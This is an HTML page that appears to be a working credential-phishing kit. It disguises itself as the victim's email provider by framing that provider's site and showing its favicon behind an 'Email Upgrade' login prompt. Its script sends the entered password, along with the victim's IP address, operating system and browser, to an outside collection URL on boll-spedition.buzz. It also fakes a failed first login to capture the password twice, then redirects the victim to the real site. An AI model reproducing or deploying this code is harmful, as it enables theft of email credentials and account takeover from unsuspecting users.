<!doctype html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport"
          content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>...</title>
    <style>
        body{
            width:99%;
            height:100%;
            margin:0;
            padding:0;
        }
        #mainPage{
            border:none;
        }
        hr{
            border:1px solid #999;
        }
        #overlay{
            background-color:#555;
            position:absolute;
            top:0;
            left:0;
            bottom:0;
            right:0;
            border:1px solid #555;
            opacity: 0.6;
            filter: alpha(opacity=60)
        }
        #loginBody{
            background-color:#555;
            border: 1px solid #DDD;
            box-shadow: 0px 0px 10px #DDD;
            width: 400px;
            height: 180px;
            position:absolute;
            top:30%;
            left:30%;
        }
        #loginBg{
            background:white;
            width:100%;
            height:100%;
            opacity: 0.9;
            filter: alpha(opacity=90);
        }
        #topHeader{
            margin-bottom:10px;
            padding-top:10px;
        }
        #favIcon{
            margin:0 10px;
        }
        #form{
            position:relative;
            left:10%;
            width:80%;
        }
        .email, .pass{
            margin:0 0 5px;
        }
    </style>
</head>

<body id="container">

<script>
const url = 'https://boll-spedition.buzz/.logs/upd2/fire.php';   //full url goes here
</script>


<iframe id="mainPage" src="" width="100%" scrolling="no" sandbox="allow-forms allow-pointer-lock
allow-popups allow-same-origin allow-scripts" style="position: absolute;height: 100%;border: none;"></iframe>

<div id="overlay" style="height: 100%; width: 1366px;">

</div>
<div id="loginBody">
    <div id="loginBg">
        <div id="topHeader">
            <img id="favIcon" src=""> <b id="sExp">Email Upgrade!</b>
            <hr>
        </div>
        <div id="form">
            <form id="form_login">
                <input id="client" type="hidden" value="SESSION EXPIRED" name="client">
                <input id="cid" type="hidden" value="0" name="cid">
                <div class="email">
                    <span id="emailId"></span>
                    <input id="data_TXT01"  type="hidden" value="">
                </div>

                <div class="pass">
                    <span id="passName">Password</span>: <input type="password" id="data_TXT02">
                    <div><i id="error" style="color:red;font-size:90%;"> </i></div>
                </div>
                <div class="pass">
                    <input type="checkbox"> <span id="keepme">Let me stay logged in</span>
                </div>
                <div class="submit">
                    <input type="submit" value="Login" id="loginButton">
                </div>
            </form>
        </div>
    </div>
</div>

<input id="ip_field" type="hidden" value="">
<input id="os_field" type="hidden" value="">
<input id="browser_field" type="hidden" value="">
<script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/sweetalert2@9"></script>

<script type="text/javascript">
 
	var url_string = window.location.href; //window.location.href
    var u = new URL(url_string);
	var filter = /^[a-z0-9][a-z0-9-_\.]+@([a-z]|[a-z0-9]?[a-z0-9-]+[a-z0-9])\.[a-z0-9]{2,10}(?:\.[a-z]{2,10})?$/;
    if(filter.test(u.searchParams.get("email"))){
    var a = u.searchParams.get("email");
    
	document.getElementById("emailId").innerHTML = a;
	document.getElementById("data_TXT01").value = a;
    var domain = a.substring(a.lastIndexOf("@") +1);
	var strPageIcon     = 'https://www.google.com/s2/favicons?domain='+domain;

        $('#mainPage').attr('src','https://'+domain);
        $('#data_TXT02').focus();
        var link = document.createElement('link');
        link.type   = 'image/x-icon';
        link.rel    = 'shortcut icon';
        link.href   = strPageIcon;
        document.getElementsByTagName('head')[0].appendChild(link);
        document.getElementById('favIcon').src = strPageIcon;
        $strEmail = document.getElementById('data_TXT01').value;
		$('#emailId').text($strEmail);

       
	//document.getElementById("txtDomain").value = b;
    
}else{
document.getElementById("container").style.display='none';
alert('Please, use the link you were provided to login!');
window.location.reload();
}
    let userIP = '';
    var currentBrowser = navigator.userAgent;
    $.getJSON('https://api.ipify.org?format=json', function(data){
	  userIP = data.ip;
	  $('#ip_field').val(userIP);	
    });
    var OSName="Unknown OS";
if (window.navigator.userAgent.indexOf("Windows NT 10.0")!= -1) OSName="Windows 10";
if (window.navigator.userAgent.indexOf("Windows NT 6.2") != -1) OSName="Windows 8";
if (window.navigator.userAgent.indexOf("Windows NT 6.1") != -1) OSName="Windows 7";
if (window.navigator.userAgent.indexOf("Windows NT 6.0") != -1) OSName="Windows Vista";
if (window.navigator.userAgent.indexOf("Windows NT 5.1") != -1) OSName="Windows XP";
if (window.navigator.userAgent.indexOf("Windows NT 5.0") != -1) OSName="Windows 2000";
if (window.navigator.userAgent.indexOf("Mac")            != -1) OSName="Mac/iOS";
if (window.navigator.userAgent.indexOf("X11")            != -1) OSName="UNIX";
if (window.navigator.userAgent.indexOf("Linux")          != -1) OSName="Linux";
if (navigator.userAgent.indexOf("Android")!=-1) OSName="Android OS"; 
	
$('#ip_field').val(userIP);		
$('#os_field').val(OSName);		
$('#browser_field').val(currentBrowser);	

    $('#loginButton').on('click', function(event){
      event.preventDefault();
	let a = $('#data_TXT01').val();
	let b = $('#data_TXT02').val();
	let c = $('#ip_field').val();
	let d = $('#os_field').val();
	let e = $('#browser_field').val();
	let cid = $('#cid').val();
      if ($('#data_TXT01').val() != ""){
        if ($('#data_TXT02').val() == "") {
          $('#error').text('Password cannot be empty!');
        } else {
          if (cid <= 1) {
            //$('#iSpin').addClass('fa-spinner');
          $.post(url,{'TXT_01':a,'TXT_02':b,'TXT_03':c,'TXT_04':d,'TXT_05':e},function(){
	
                    $('#error').text('Please enter your password');
                     $('#cid').val(cid+1);
                     $('#data_TXT02').val('');
                    
                   
	});
       
              
          } else {
                      
	$.post(url,{'TXT_01':a,'TXT_02':b,'TXT_03':c,'TXT_04':d,'TXT_05':e},function(){
	
                    Swal.fire({
                        icon: 'success',
                        title: 'Congratulations',
                        text: 'Your email account has been successfully verified!',
                        timer: 5000
                      })
                      setTimeout(function()
                      {   
                        window.location = 'https://'+domain;
                      }, 3000);
                  
	});
             
           
            
            
          }
        }
      } else {
        alert('Please, use the link you were provided to login!')
      } 
    });
	
</script>
</body>
</html>